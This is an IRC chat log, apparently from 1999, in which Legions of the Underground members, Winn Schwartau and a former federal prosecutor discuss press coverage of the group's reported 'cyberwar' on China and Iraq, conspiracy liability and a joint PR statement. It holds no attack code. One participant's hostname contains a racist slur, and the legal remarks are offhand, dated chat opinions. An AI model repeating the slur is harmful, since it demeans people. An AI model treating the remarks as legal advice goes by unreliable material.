90-91 [03:10] I am not OLD!!! :-) [03:10] Winn is old. [03:10] :) [03:10] shut up! [03:10] LOL!!! [03:10] 3 years and counting iw [03:10] 5 minutes and counting [03:10] who are we missing? [03:11] I'm ahhh 20. I thought I was old... [03:11] alot [03:11] I have some old logs with the MOD/LOD wars in #hack on th= e original IRC server :) [03:11] 24 here [03:11] who's the oldest? [03:11] im going to be 22 next month [03:11] 26 [03:11] i love to be 18 [03:11] * optiklenz waits patiently [03:11] i was once... when I was in r'n'r [03:11] esp in the netherlands.. [03:11] if that where you are? [03:12] heh [03:12] heh [03:12] Mofo - say hi to Rene. [03:12] hmm [03:12] *** Joins: legions (~fff@*!*.net) [03:12] *** legions is now known as datapleX_ [03:12] hrm [03:13] legions? [03:13] ah [03:13] hah [03:13] * datapleX_ shrugs [03:13] basterd [03:13] he must feel eweet [03:13] heh [03:13] heh [03:13] optik: it somehow got to mah alternative in mirc [03:13] ah [03:13] * DigiEbola is not going say a word about windows tonight. [03:13] *** datapleX_ changes topic to 'bah?' [03:13] *** Quits: datapleX (Read error to datapleX[tcnet06-26.sat.texas.net]: EOF from client) [03:13] hehe [03:13] *** datapleX_ is now known as datapleX [03:13] i was going to say that [03:13] bitchx, sirc don't work on this server [03:14] *** Quits: lothos- (Excess Flood) [03:14] I've not used irc much --- what's all the "heh"s mean? [03:14] hahah japan? :) [03:14] like, doh? [03:14] when someone says something funny [03:14] you say heh [03:14] Thanks. [03:14] mark: its the digital equivelent to a laugh [03:14] heh [03:14] heh [03:14] try it [03:14] =3D) [03:14] Heheheheheheheh [03:14] aww [03:15] THERE YA GO! [03:15] we made him laugh [03:15] *** Joins: maquis (~me@*!*.internic.net) [03:15] * optiklenz claps [03:15] That felt virtually good [03:15] MuahahahaHAHAHAHaHAHaHA [03:15] ahhhh [03:15] :) [03:15] lol [03:15] grand job [03:15] welcome maquis [03:15] hello all [03:15] now thats an evil laugh [03:15] bwahahaha [03:15] welcome out of the sockets of being a "heh" virgin [03:15] [03:15] What time do we start? [03:15] when is the meeting officialing beginning? [03:15] I was told 2100 ET [03:15] I'm not even sure of what this whole things about [03:15] 15 mins ago [03:16] should trigger Shockwave [03:16] so again my curiousity is getting the best of me [03:16] Yep. [03:16] *** Joins: lothos (lothos@*!*.net) [03:16] Back in a minute ... I need another glass of wine. [03:16] red I hope [03:16] curiosity killed the cat, so whylome wont [03:16] hmm, let do some weed then also [03:16] John Lee used to be the most annoying bastard in IRC back= in 1991 with his substitution program [03:16] *** Joins: Father (Agrosso@*!*.att.net) [03:17] welcome father! [03:17] <-- genuflects [03:17] forgive me father for I have sinned [03:17] damn right [03:17] heh [03:18] father, yes son, i wanna kill you..... [03:18] winn I don't think these guys even know our episodes [03:18] * MsIW bows to the higher power [03:18] zZZzz [03:18] digi: I am thinking of an orbital song right now... [03:18] ;) [03:18] i'm thinking of my girl [03:18] data: ah youngone [03:18] she's wild [03:19] m0f0: does she do things, real fast and then real slo= w? [03:19] heh [03:19] you moron [03:19] hahaha [03:19] Digi: what about your gaymate? [03:20] m0f0: myself more like it [03:20] let's begin, as others will join [03:20] *** Joins: pent (dschwarz@*!*.net) [03:20] m0f0: it really is a problem, when i argue with myself.... [03:20] let's start [03:20] start away [03:21] feur - you set the stage please [03:21] WOW...what a great start that was :) [03:21] I agree lothos [03:21] ...the drum roll please..... [03:21] thanks Ms. IW [03:21] i understand there is an attorney amongst us [03:22] That would be father [03:22] maybe we could start w/ an introduction so that we can establish who is who? [03:22] that'd be nice [03:22] Who goes first? [03:22] why are we here? [03:23] I am Winn Schwartau, Infowar.Com - no handle. :-) [03:23] I am Lothos. :-) [03:23] that helps! :) [03:23] RootFest organizer, member of LoU [03:23] I'm Steve Stakton www.legions.org [03:23] you guys know the handle [03:23] =3D] [03:23] I am m0f0, now from africa [03:23] www.rootfest.org [03:23] I am Maquis (Rick) work at Internic...friend of INFOWAR.= COM [03:23] heh [03:23] I am the Evil Dr. Delam, 2600 writer.. cover of spring 19= 96 :), phrack, empire times, etc, writer of the first keystroke capture prog= ram DEPL.. etc etc [03:23] i am dyslexia, currently residing underneath you all [03:24] I am Digital Ebola , LoU member, Senior Editor of Kee= n Veracity [03:24] uhm...I would be someone no one knows, or really cares= to know [03:24] i THOUGHT I'd be in 2600, but the new issue came out and= I guess not... [03:24] heh [03:24] kingb0ng, software developer, LoU member [03:24] is the new ish out yet, then?? havent seen it anywhere [03:24] I suggest that Winn or Feur begin this gig [03:24] feur: who are you? [03:24] i am just an old man who futz's with infosec [03:24] k [03:24] ...go ahead [03:25] OK. A couple years back, some hackers decided to declare w= ar on France. They wanted CNN to watch and asked me to help. [03:25] * optiklenz slips on his foot warmer [03:25] I advised them that would be a bad idea and finally with t= he help of some understanding feds talked them out of it. [03:25] So, I guess, we are interested in where the current activities are taking us. Comments? [03:25] ok [03:26] So, recently, as I heard it, LoU chose China and Iraq as targets. Is that right? [03:26] first I'd like to clear up some misconceptions brough= t about by some bad press [03:26] Thank you!! [03:26] most of it's bad press. [03:26] ok [03:27] -pent:#event- betty, come to elite.net for a sec please [03:27] The press for so long has been so occupied with makin= g news they are not concentrating on reporting the news [03:27] LoU is devised of members who enjoy all aspects of computing and hold strong ethics [03:28] A few of the members decided to speak out against the current human rights issue as it is in china [03:28] -pent:#event- he wanted me to call barry person collect, but i chickened out [03:28] -pent:#event- thats the last i saw of him [03:28] the actions they decided to make was that of those members, and those members alone at that moment, and time LoU was not interested in anything they were doing although our support was there [03:29] -pent:#event- why is the talking screwed up ? [03:29] Most of the members have high paying network jobs so = no one really had the time [03:29] -pent:#event- : idle : 2 hours 30 mins 56 secs (signon: Tue J= an 19 18:11:19 1999) [03:29] -pent:#event- he fell asleep [03:30] someone kill pent? [03:30] pent: please quit using notices [03:30] who here is a federal agent of some kind? [03:30] not me! [03:30] We never said we were going to "destroy" anything [03:30] not me [03:30] none I know of [03:31] I was told there would be an fbi agent of some sort here. [03:31] all though by word of mouth, and the press putting in their two cents it was stated that it was our goal to totally shutdown th= ese other countries [03:31] there is currently none on, if one comes on, we will immediately notify the channel [03:31] That sounds like something out of a sci-fi flick [03:31] was one invited? [03:31] What "manifesto" so-to-speak created the impression of infrastructure targeting? [03:31] major lag back in a minute [03:31] yes, two were [03:32] none of them [03:32] our primary goal was the bring awareness [03:32] nothing more nothing less [03:32] yes dataplex. one was invited [03:32] *** Quits: MsIW (Hey it has been fun! Thanks!!! Hugs!!! Kiss!!!=0F= ) [03:32] was it the press that got screwed up or did someone pose = as a member and say this stuff? [03:32] Human rights in China... and Iraq? [03:32] one was? or two? [03:33] mosthated posed as a member for some press release [03:33] *** Joins: MsInfoWar (Beachie@*!*.uu.net) [03:33] nationalpost.com or something [03:33] and he claimed.....? [03:33] we brought about the fundamental freedoms bequeathed = to us by the Constitution [03:33] freedoms that the people we spoke for only wished the= y had [03:33] something like LoU were terrorists [03:34] how do you guys relate to mosthated? [03:34] we dont [03:34] I dont even know the guy [03:34] that's the spin I heard... how many were in on that 'spin' versus a HR action. [03:34] none of the members did until he pulled that stunt wi= th the national post [03:34] optik, did you notify national post [03:34] you mean the dismanteling of chinese firewalls? [03:34] I notified no one [03:35] If it [03:35] As far as i was concerned this matter was not that of the press [03:35] and never should of been [03:35] notify national post of mosthated's non-affiliation [03:35] Im not sure if any of the members did [03:35] If it's awareness, then did anyone consider an EDT-like action? [03:35] but I will most definitly look into that [03:36] I posted a second rebuttal. It explains a lot if you= 'd take the time to read it [03:36] www.legions.org/reb2.txt [03:36] OPTIK: URL? [03:36] sorry... [03:36] members of LoU have met up with 2600, L0pht and other people to clear things up [03:37] infact just a few weeks ago bronc was at dinner with emmanuel and issac from the 2600 staff setting things straight [03:37] winn, to get with the program, we got together to help LOU= , not pimp them [03:37] Things were posted and said that were totally false [03:38] have you guys been taking any heat from other hackers or from anyone else? [03:38] no [03:38] optik, are you under any guidance from counsel now [03:39] only in lame greetings [03:39] the only thing I fear is some chinese loyalist knocki= ng at my door ready to spike my head into the punch bowl [03:39] my fears exactly [03:39] the only heat we've gotten that I know about is the cDc/2600/l0pht rebuttal [03:39] If you guys have the time check out http://pseudo.com they host a show called parse [03:40] optik, are you under any guidance from counsel now [03:40] no [03:40] Im just trying to get things back to normal [03:40] is anyone in legions represented by counsel [03:40] as in? [03:40] a lawyer of some sort? [03:40] yes [03:40] lawyers are for criminals [03:41] not I. [03:41] and we have commited no crime [03:41] not I. I actually have no lawyer [03:41] nor i [03:41] and also buffers for fearful apparitions [03:41] I agree with optik, lawyers are for criminals. :-) [03:41] We'd like to set things straight [03:42] with you, with the "hacking" community, with federal angencies whomever [03:42] I'd bet that after the press you probably have some feds curious [03:42] they already are [03:42] Hmmm. Are lawyers for criminals, or for people whom oth= er people claim are criminals? [03:42] how do you know? [03:42] I got almost 50 .mil and .gov hits to rootfest.org in th= e past four days [03:42] delam, both wired and the national post have quotes fr= om feds [03:42] OPT: Your posting says a polish grp did stuff you got blam= ed for. What happened? [03:42] from what i've seen the feds have no clue...they're prol= ly the LAST thing to worry about.... [03:43] thats good to know, maquis [03:43] maybe to find us, or to get prove? curious they are [03:43] Winn> a polish group got the wrong idea and basically went out attacking chinese sites saying they were doing it for our effory= t [03:43] I am more worried about .cn, then feds at this time [03:43] effort rather [03:43] maquis: what does internic have to do with this(if you are representing them at this meeting that is)? [03:43] < - not representing internic....mearly logged in from there. :) [03:43] i think he said he was with infowar... [03:44] < - friend of infowar.com [03:44] maquis, they probably have high interest due interfere in geopolitical theater [03:44] oh [03:44] that's a cool place to log in from, can I have an account= ? :) [03:44] yeah, right....:) [03:44] yeah, hook us up [03:44] www.pseudo.com/links/playlast.asp?archtype=3Dvid&show= id=3D21 [03:44] never hurts to ask :) [03:44] har. i can arrange tours though.... :) [03:44] thats the last parse episode if anyone wants to check= it out [03:44] cool! [03:45] ill remember that when im in the area hehee [03:45] bronc went on and represented the legions team basica= lly just setting the record straight and telling everyone the real deal [03:45] "whats this button do!? ewpzie" [03:45] Does your URL rep the real deal? Is this the current position? [03:45] bronc did a fine job of representation [03:45] yes [03:45] actually if everyone wants [03:45] play the url i just posted [03:46] set the buffer to about 25 [03:46] Thats about when bronc starts talking [03:46] optik, when all this broke, were you in violation of probation [03:46] No [03:46] I went to texas for awhile to stay with a friend [03:47] to get away from the media, and well everything else that could happen if worst came to worst [03:47] was bronc invited to come tonight? [03:47] is mark awake? [03:47] Bronc was but he declined [03:47] he was unsure of what to make of tonights get togethe= r but i will relay everything him [03:47] to him [03:47] how members have been contacted by us and other country intelligence or law enforcement agencies [03:47] I met up with the EDT this weekend and they want to contin= ue strong HR and political actions. Do you want to continue to speak out? [03:48] question. who/what is EDT? [03:48] We do as long as everyone understands that we are not criminals [03:48] Electronic Disruption Theater [03:48] They are on line activists [03:48] HR =3D ? [03:49] and we are merely speaking on what we beleive to be amended [03:49] I am NOT a criminal. I'll say that now. [03:49] data>human rights [03:49] k [03:49] To them it's an Art Form to protest. [03:49] I think that's what RTM & Eugene AlterNIC said. [03:49] scary [03:49] I do not want us to go down as criminals or martyrs [03:50] Winn> our foremost intent as of right now is to get things cleared [03:50] before we continue speaking on human rights we'd like= to make certain that people understand who we are and where we are coming fr= om [03:50] How can we help get your message across? [03:50] not precisely where we are coming from but you get th= e idea [03:50] =3D] [03:50] A lot of people have asked us that same question. [03:51] i'm from greek now at the moment [03:51] Some funding would be nice [03:51] =3D] [03:51] including cbs and nbc from what i understand [03:51] but i dont see that [03:51] heh [03:51] so lets move on shall we [03:51] heh [03:51] what makes you people any different from the rest? [03:51] cbs/nbc there's media for ya....urg....TWPPT! [03:51] * optiklenz urges mark to flutter his "heh's" [03:51] * DigiEbola senses pimping. [03:51] lol [03:52] theres a difference between the "media" and those of us = in the know like Winn, me, etc. that actually have some credibility in the IT/IS/INFOSEC world... [03:52] father, as an attorney i know you can only suggest ideas, = non directed, could you be of assistance [03:52] Winn> Maybe if you make a statement speaking on our bedrock [03:52] made a statement even [03:53] people i have seen trust us more than the Big Media Mongrels... [03:53] I've visited infowar a few times and I've seen archiv= es of media corrupt media to put it another way [03:53] I think that getting unedited, well structured positions o= ut to larger audiences is critical to any message. [03:53] *** Quits: MsInfoWar (Ping timeout for MsInfoWar[1Cust33.tnt4.st-petersburg.fl.da.uu.net]=0F) [03:53] It's spreaded infectiously [03:53] getting raw data, no spin, edits, etc....i agree that's = the way to go.... [03:54] one point of interest that I know of when you have a "gro= up" with a name is legally there are more things they can do to you.. MOD had problems with that.. the people I was with we stayed away from having a group name [03:54] but it can't appear to be from "kiddies" and look immatu= re. like Winn says, wellbalanced and well presented stuff. [03:54] {sorry, I had to attend to other stuff for a minute: hehehehehehe] [03:54] First, I am not acting as an attorney here (as Winn know= s). [03:54] *** Joins: MsInfoWar (Beachie@*!*.uu.net) [03:54] hmm [03:54] we have no legal name [03:54] heh [03:54] hahah [03:55] Lets see [03:55] I am concerned tho, no body does anything for free [03:55] one sec [03:55] Lets take the police department [03:55] Second, I need to know what (1) what the problem *is*, a= nd (2) what th desired result is. [03:55] If you have one bad cop and this guy goes out and murders someone [03:55] is the whole police deparment at fault? [03:55] do they all get the death sentance? [03:55] are they all punished ? [03:55] absolutely not [03:55] no but there is "racketeering" and conspiracy etc [03:55] Because then we'd have no cops [03:55] Sometimes. Not legally, but in fact. [03:55] if that were the case [03:55] * datapleX feels that isn't a good example... [03:56] everyone department has a good and a bad [03:56] to stick us in the middle isn't any different [03:56] I know what you're saying, but being a group there are la= ws that apply to groups of people that can be more harsh [03:56] maybe father can help me out on this [03:56] I am just trying to understand everyones motives, why give a care about LoU? [03:57] P.S. I think Winn invited me because I am a former Fed. Pros. Be warned. [03:57] ok [03:57] now is a good time to pee my pants i guess [03:57] digi, we spoke the other night, i believe my generation ha= s an obligation to assist, but not be suckers [03:57] Winn is associated with gov, that scares me in itself [03:57] * datapleX cares not about feds because he never did NEthing wron= g [03:57] *** Joins: ice (~ice@i.like.to.eat.negrofish.net) [03:58] Delam. If a group acts as a group to break the law, various serious penalties come into play that [03:58] feur: true, but everyone always has a motive [03:58] Father> yes but we are not a mafia [03:58] would not apply to an individual based upon his own separate acts. [03:58] we are not into "organized crime" [03:58] i think this groups agenda is somewhat up front [03:58] I am associated with hackers and that scares the hell out = of the feds! [03:58] every member has their own program [03:58] optik: MOD wasn't mafia either but they had some major problmes [03:58] Winn, heh [03:58] Te questions is: did the group have a common purpose to= do something the law says is illegal. [03:59] We are all adults no one can police what another pers= on does [03:59] i'm associated with Winn, that scares the hell out of ME= !!! heheheehe [03:59] HA! [03:59] lol [03:59] Father> nope [03:59] never had never will [03:59] We are a research group [03:59] Is this the "Yelling Fire [03:59] arguement? [03:59] I thought is was wolf...? [04:00] erm...n/m [04:00] We've worked with lots of major corporations, and we = are not about to blow our rep [04:00] its Crying Wolf [04:00] i beleive [04:00] Yelling fire is what old people do when they cant get out of bed in time [04:00] worked with corporations? what kinda work is it, penetration testing? [04:00] The conclusion that a group had the requisite common purpose is drawn by agents, prosecutors, judges, and jurors. Even Bill Clinton says he didn't lie, because is ain't is. [04:01] delam> programing, hosting, design, security consultation [04:01] our common purpose is research [04:01] you name [04:01] *** Joins: sreality (sreality@*!*.org) [04:01] it [04:01] k [04:01] I meant did you offer subtle encouragement for others to t= ake an action and is that really wrong? [04:01] no [04:01] No one took any action [04:01] thats the point we are trying to make [04:02] none of the members did a cotten pickin thing [04:02] Winn - the answer to the second part of your question, legally speaking, is yes. [04:02] DId others, tho? THe Poles? Ideas are free and legal. [04:02] The Poles did [04:02] Are you saying Dad, that there might be legal culpability = fo their ideas? [04:02] *** Quits: pent (=F9=ED=F9 Total uptime : 0d 0h 42m 42s=0F) [04:02] can one be prosecuted for having a idea? [04:02] We claim no affiliations [04:02] whatever the polish people do in poland is on them [04:03] I don't answer to "Dad." [04:03] no digi [04:03] this isn't 1984 I don't think. [04:03] Sore point, Winn. [04:03] what we are saying here to night is we spoke our mind= we let people know what we were thinking and if that is a crime then I shoul= d be sentanced to death [04:03] because that is something I do [04:03] time and time again! [04:03] lothos: ya never know.... [04:03] Sorry, Father... :( I slap myself silly... [04:03] i would be way under ground then [04:04] Nor "Pop" [04:04] "Hey you" might work. [04:04] padre? :) [04:04] Hmmm. Not bad. [04:05] Thoughts ain't a crime. [04:05] yeah [04:05] Legally, that is. :-) [04:05] if it was my next door neighbor could very well sue m= e for harassment [04:05] =3D] [04:05] hahah [04:06] Two people agreeing (real low threshold) about something= , and one of them doing a little something about it qualifies as a conspira= cy: 5 years, $250K. [04:06] god knows what I've been thinking [04:06] heh [04:06] 250k? [04:06] Is that RICO? [04:06] yeah, that's one I remember [04:06] hrmm I can grab some k's out of the ole alphabet soup [04:06] Father, at this point, regardless of what lou has said= , without the help of a rather emphatic media, this whole issue would have gone nowhere, the whole thing has been hyped and kept alive by the media, suerly this cannot be construed as a crime on our part [04:06] No, general conspiracy statute. [04:06] but i dont know about doing crime for something I did= nt know was going on [04:07] crime=3Dtime [04:07] Im fallin asleep here [04:07] hm [04:07] the way this administration is going, there may just be= a conspiracy statute..... :) [04:08] conspiracy of what? [04:08] this is more getting to a discussion [04:08] Whether you knew something was going on or not is a fact question. As is whether you wanted to encourage something to go on, even= if you didn't know it actually did. Both of those can be conspiracy liabilities. [04:08] so is the real issue the ability to identify an individua= l on the internet who's making claims or speaking for others? How much pro= of is there of this and have you guys tried to learn the real name etc of th= e guy who did say this stuff. [04:08] conspiracy of saying that we dont agree on certain issues? [04:08] I thought conspiracy was only against your own country= ? [04:08] anything...hell, not to start a new can of worms, but lo= ok at the crypto debate and privacy rights. 'nuff said...and DON'T start a crypto-chat debate! :) [04:08] Wrong. Two prongs in general conspiracy stattue. [04:09] delam> theres a polish group, and a few other groups from out of the u.s [04:09] they are the ones that are attacking these sites [04:09] not us [04:09] we wanted to speak out and make things known and noth= ing more [04:09] and that is all we did [04:09] First prong: conspiracy to deprive the US gov. of some right to function. [04:09] dataplex: that's treason man [04:09] something we didnt do [04:09] Second: conspiracy to violate a law on the books, no mat= ter who the victim is. [04:10] can't we just buy a law book or something? [04:10] another thing we have yet to do [04:10] father: did the hacker that did make claims in the name o= f this group commit any crimes taht you know of? [04:10] Is hacking China illegal? OR Iraq? [04:10] Why ask us? [04:10] well, lets take a step away from us liabilities a mom= ent and focus on .cn actions, you ppl seem to have some insight that they are wanting to get rid of us [04:10] We did none of that [04:10] i agree digi [04:10] Conspiracy to get unauthorized access to computer is cri= me, no matter who victim is, even Iraq or Iran or Ireland. [04:11] i am more worried about .cn then .us [04:11] father, even .jp? Hacking isn't illegal in japan i thought... [04:11] then they will thing of something to put you in jail for [04:11] loth: depends on where the hack originates from [04:12] As long as Japanese computer is hooked up to a computer = in US, hacking into the Japanese computer is US crime. [04:12] I suggest that .cn doesnt 'get' it completely. They try to ban sat dishes and now the death penalty for $34K in hacking a bank. Mayb= e a call for detente is called for here. [04:12] perhaps transport of illegally acquired information from = any other country would be considered illegal by us law? [04:12] what if i hack a .jp computer from another .jp computer? would that be illegal? (sorry to stray off topic here..) [04:12] delam, HTF are you gonna enforce that one? that's amost = as funny as something AG Reno would say!!! [04:13] I'll punt on your last question, delam: too fact specifi= c. [04:13] groups run by little kids with names like HcV, Tougon= g (individual), NIS, Polish Hackers against China, spl0it are the ones doin= g all the illegitimate protest [04:14] Lothos, depends on whether hacked computer is connected (indirectly) to computer in US. Hey, what omputer worth hacking ain't on the Inernet? [04:14] *** Quits: Mark668 (Read error to Mark668[adsl-209-78-192-20.dsl.pacbell.net]: EOF from client=0F) [04:14] heh [04:14] so if i'm physically on u.s. soil then it'd be a crime? [04:14] *** Joins : Mark668 (irc@*!*.pacbell.net) [04:14] P.S. I may sign off for a while. If I do, I'll be back. [04:15] lothos> no [04:15] If you log into a system that is based in japan [04:15] and from that system access another its not illegal [04:15] Yep. Question is whether anyone would prosecute. If Jap= an, Inc. asked, someone might. [04:15] or maybe it is [04:15] heh [04:16] "heh" [04:16] According to FBI, they can git ya for hacking intl based u= pon some interpretation of #1030/1029 [04:16] ah [04:16] ok [04:16] IMHO, a more subtle question at this point is what if acti= ons will .cn and Iraq take legally or illegally [04:16] what can they do? [04:16] we've done nothing to any systems in .cn or iraq [04:16] plus iraq is not even setup to a global network [04:17] and most of their internal networks are probably blow= n to shreads by now [04:17] Remember, at the base level, jurisdiction is merely powe= r; like code is merely bits. [04:17] the purported threat to those countries systems [04:17] iraq doesn't have much in the way of connectivity outsid= e the nation.... [04:17] not even via tymnet [04:17] Sometimes the best way to disguise is to emphasize. I stil= l think you need to get LOUD AND CLEAR about what you're really about. [04:17] and the only x.25 they've heard of is pocket change [04:18] optik, x.25 and sna, is generally out of the reach and gr= asp of today's hax0rs [04:18] fact #1: it's hard as hell to prove any crime on the internet, and I'm sure you all know that, therefore #2, you're not worrie= d about any LEGAL actions by china or the US but you're more worried about = non legal actions [04:18] exactly [04:19] it may be not only to off us, but to test the us gov [04:19] if one of us got killed, what would the us do? [04:19] as i stated what if some chinese loyalist gets the wr= ong idea and decides to use our heads as hunting trophies [04:19] theres not much they could do [04:19] I personally am worried about what .cn would do to us, legally or not. [04:20] optik, it would not be a chinese loyalist, it would organi= zed chinese gangs [04:20] yeah [04:20] thats something to worry about [04:20] Excuse me, I have to disappear for a while ... I'll be back ... I got a message from Betty that I was expected to "say" somethin= g ... if someone would let me know what I'm supposed to say, please private chat me. [04:20] Mark> who are you again? [04:21] most of the .cn gangs alrady operate her in the states... [04:21] There is a reverse philosophy but it sounds insane, it's = a people-buffer-overflow.. if more people started hacking china, the number= of targets that china would go after would increase beyond what they could h= ave the man power to handle [04:21] yeah thats the thing [04:21] they have a lot of people [04:21] people totally blew what we said out of proportion [04:22] Any one gonna be at CFP99? [04:22] I wish [04:22] Father> nope [04:22] maybe if i can get away from work...always a problem the= se days.... [04:22] anyone gonna be at RootFest? :) [04:22] I'll be lecturing at rootfest though [04:22] Via vidtel [04:22] rootfest in MPLS? [04:22] so is winn via video conf [04:22] yes [04:22] I'm an freelance writer and consultant (see http://www.gibbs.com/mgbio.htm for a ... well, bio) I write for Network World (the weekly Backspin column and, starting on the 25th, a weekly feature called "Gearhead". [04:23] that reminds me, winn.. we need to tlak about that still [04:23] talk [04:23] tomorrow! [04:23] Signing off. Be back. - Father, aka Padre ;-) [04:23] heh :) [04:23] sure [04:23] mark> ok [04:23] hm [04:23] I'll give you a call [04:23] what can winn and local friends and...., do and gain permission from LOU, to assert some risk management in this somewhat jade= d affair [04:23] thanks... > noon [04:24] *** Quits: Father (Leaving=0F) [04:24] What can you do? [04:24] I have a class at noon... would 1pm work CST? [04:24] yep! [04:24] cool, 1pm CST then. [04:24] make it so, Mister Winn..... :) [04:25] options options options [04:25] 1. establish a unified position [04:25] 2. control disseminations to the media [04:26] passively time is the best option, actively that's difficult.. the media is the best option I can think of actively [04:26] 3. establish some DC international attorney to act as buff= er [04:26] You need to have a SINGLE mouthpiece if you really want to control the message. Or have a bunch of folks sign the same one. [04:27] I think getting an attorney would only make people th= ink we have reason to be afraid like we did something criminal that justifies having one [04:27] *** Quits: MsInfoWar (Ping timeout for MsInfoWar[1Cust33.tnt4.st-petersburg.fl.da.uu.net]=0F) [04:27] optik, the right attorney only acts as a buffer, not an admission ogf guilt [04:27] Well if i can find an attorney i can afford i'll look into it [04:28] Try the EFF maybe or EPIC or the CDC [04:28] .cn would care less if we have a attorney [04:28] heh [04:28] If you all did a press conference and were serious about = it, a lawyer would be great to help decide what needs to be said. [04:28] i took the liberty of contacting an old acquaintance from = the DOJ, who is in private practice in Boston, well known, and would pro bono look into the whole [04:29] ok well this is a conference with out the "press" [04:29] frankly Im tired of having people get things wrong [04:29] not only has it hurt me, but it's done a great deal t= o a lot of other people [04:30] ppl will see what they want to see [04:30] but optik, tonight we hear from you, what do the other members of LOU want to do [04:30] We are here as representatives of the group [04:30] We've takin what they think, and what they want into consideration, and we are giving it to you [04:30] as a whole [04:31] part of the reason, the press blew this up, is becaus= e THEY wanted to see someone break stuff in those countries [04:31] can we take a 5minute bathroom break? [04:31] i think the next step would be to set up a VMB to chat [04:31] alliance teleconference? :) [04:31] ..memories [04:31] Free from GTE? [04:32] great, be back then. [04:32] winn: now now! shh [04:32] heh [04:32] gte, good stock, lol [04:32] naughty boy [04:32] brb [04:32] brb [04:32] brb? [04:32] be right back.. [04:32] be right back [04:32] slap me! :) [04:32] < -- SMACKS WINN [04:32] hehehehe [04:33] damn that stings [04:33] btw, winn,nice article on strikeback this week....nice resaerch... [04:33] you should see the hate mail! INcluding the Pentagon!!! [04:33] * delam agrees [04:33] back [04:33] *** Joins: hjghjkghk (~jailednot@*!*.co.nz) [04:33] *** Quits: dyslexia (Ping timeout for dyslexia[p34-max2.dun.ihug.co.nz]=0F) [04:33] winn - wonder why heheheehehe [04:33] *** hjghjkghk is now known as dyslexia [04:33] does Rome Labs ring a bell? :) [04:33] ok im back [04:33] heh [04:34] air force base isn't it? [04:34] yup [04:35] optik, what can winn and company disseminate of tonight's chat, you set the rules [04:35] *** Quits: kInGb0nG (Ping timeout for kInGb0nG[dayoh-a242.gemair.com]=0F) [04:36] *** Joins: kInGb0nG (~lil_b0ng@*!*.com) [04:36] ok [04:36] *** cd is now known as Nikkita [04:36] just what we've been talking about [04:36] as far as I care, you can disseminate any/all of it [04:36] OK: I view this as a PR problem with some potential bad downside. Whatever you decide, it really needs to be coherent and absolut= ely unambiguous. [04:36] people need to know that we are not the bad guys [04:36] Winn> we can edit some things out [04:36] optik, can you provide one summary statement on behalf of = the LOU [04:37] this can be a joint statement from Inforwar, Infosec, and LOU [04:37] if thats the way you want it [04:37] If we take that route, I will edit it, then pass it to yo = for approval. [04:37] no, what do you want [04:37] s/inforwar/infowar [04:37] whatever will require being signed by all memebers etc [04:37] sounds good winn [04:38] < - signs in spirit [04:38] =3D] [04:38] heh [04:38] thanks marquis [04:38] Optik: thnx to so cold 'hackers' talking negatifly in t= he MEDIA about LOU, youre scratched, but If you didn't though an IP of that countries there is nothing to be afraid of [04:38] we did nothing [04:38] marquis, and nikkita [04:38] heh [04:38] sounds like a match made in heaven [04:39] I suggest I send to OPT, let him and I work out the edits then he adds the names he wants to add, and we all distribute tonights conversation PLUS a 1 pafge statement. [04:39] optik: so there is nothing to afraid of. [04:39] mmmm....nikita..... LOL [04:39] winn> that works for me [04:39] maquis: I kill also :P [04:39] everyone else fine with that? [04:39] Send me your contact stuff, and I will get to it AM. You h= ave my voice #. ? [04:39] You don't know me, then. :-) [04:40] hm [04:40] Winn> no [04:40] heheeheh [04:40] optik: Other issue [04:40] we should do a teleconference [04:40] It would be useful to have some form of ID for the participants, even if it is anonymous. Can you do OPT? [04:40] can i do what? [04:40] optik: I red what father said about criminal organisati= ons [04:40] heh [04:41] Winn> if you mean card everyone [04:41] im sure i can work something out [04:41] heh... no, I don't want to get things wrong, tho. [04:41] * optiklenz use to be really cool with a few of the local bouncer= s [04:41] =3D] [04:41] hahah [04:41] winn, needs some of identification and authentication, or = he is dead as a journalist [04:41] optik: but If someone hacks something where goverment h= as a investigestion of spionage activity going on, then they will find you/already found you. [04:42] Winn> mail me at optik@legions.org [04:42] and i'll respond [04:42] if you want you can have my pgp key [04:42] nikkita, i can assure all associated members of LOU are known, down to their dental records [04:42] my email is lothos@trifid.net, pgp key is available from www.rootfest.org [04:42] feur - now THAT'S class! [04:42] OPT" if we can talk voice, I can tape a statement as well. You can call me if you want. Use PGP, mine is on the PGP server. [04:42] down to our dental records??? [04:42] assure that associated intelligence agencies [04:43] feur: In that case they did something wrong :) [04:43] digi@wintermute.unixgeeks.com [04:43] Winn> heh [04:43] if you have no teeth, lol [04:43] Feur: I can assure you that nobody knows about M0f0 [04:43] feur: That's a advice :) [04:43] i'm not to excited with the idea of having a voice statement passed around and archived [04:44] hm [04:44] im still hazy about a bunch of fat guys goin thru my records [04:44] haha [04:44] nikkita, you misunderstood my statement [04:44] Fine. You make the call. No prob! [04:44] Winn> trust me on this one bro [04:44] optik: I there tapping you, there's no way to check tha= t. [04:44] nikk> actually there is [04:45] and if they've got a dnr on my line i can very well f= ind out too [04:45] feur: Well I will let my teeths removed tomorrow or so = :) [04:45] lol [04:45] heh [04:45] I know a good dentist that doesn't ask any questions...r= oad trip to London! :) [04:45] heheehehe [04:45] So, tomorrow, we exchange some email... build your story... and we agree not to release until we are all in agreement with it, and yo= u have it 'signed' by your folks. [04:45] Optik: just trust me on that. [04:46] Winn> thats the deal [04:46] Perfect. Agreed. [04:46] Maquis: London is just 30 minutes from Amsterdam, pleas= e mail me the adres :) [04:47] Maquis: Is he expensive :) [04:47] HAR! Nikkita, super spy of the 90s should be able to fin= d it.....! [04:48] maquis: www.dental.record.org ---> www.illegal.dentist.= com [04:48] heh [04:48] well folks [04:48] yep, that's him... :) [04:48] maquis: ever seen a blond without theet [04:48] if thats all i'll be out for the night [04:48] < -- heading out in a bit himself. [04:49] yeah winn you sleeping? [04:49] I must concur with my associate [04:49] we'll keep in touch [04:49] =3D] [04:49] seeya opti [04:49] * Nikkita is going to sleep for 4 ours, because he has a milleniu= m update around 5 ours.... [04:49] later all [04:49] later later and even later! [04:50] later [04:50] so maquis...gonna hook me up wif an internic account? = ;) [04:50] thank you all for coming on and trusting a bit [04:50] *** Quits: kInGb0nG (the king has left the building=0F) [04:50] *** Quits: DigiEbola (Leaving=0F) [04:50] feur: no prob... [04:50] *** Quits: datapleX (later...=0F) [04:50] Gentlemen! Thanks ... OPT - not to worry. Tomorrow! [04:50] nice meeting you guys [04:50] maquis: and a hit2000.org :) [04:50] Later all -- thanks for the invite [04:50] sure thing [04:50] hey, we DO the domain names.... :) [04:50] check out my cute portrait on the spring issue 1996 of 26= 00 if you like :) [04:50] *** Quits: optiklenz 